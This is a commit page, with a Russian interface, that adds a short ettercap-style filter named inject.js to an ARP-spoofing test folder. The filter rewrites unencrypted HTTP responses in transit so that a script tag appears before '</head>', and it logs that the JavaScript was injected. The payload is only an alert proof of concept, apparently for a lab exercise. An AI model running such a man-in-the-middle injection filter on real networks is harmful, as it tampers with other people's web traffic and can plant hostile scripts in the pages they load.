Загрузить файлы в «arpspoofing/xss_test»
This commit is contained in:
4
arpspoofing/xss_test/inject.js
Normal file
4
arpspoofing/xss_test/inject.js
Normal file
@@ -0,0 +1,4 @@
|
||||
if (ip.proto == TCP && tcp.src == 80) {
|
||||
replace("</head>", "<script>alert('XSS!')</script></head>");
|
||||
msg("Внедрен JS в страницу!\n");
|
||||
}
|
||||
Reference in New Issue
Block a user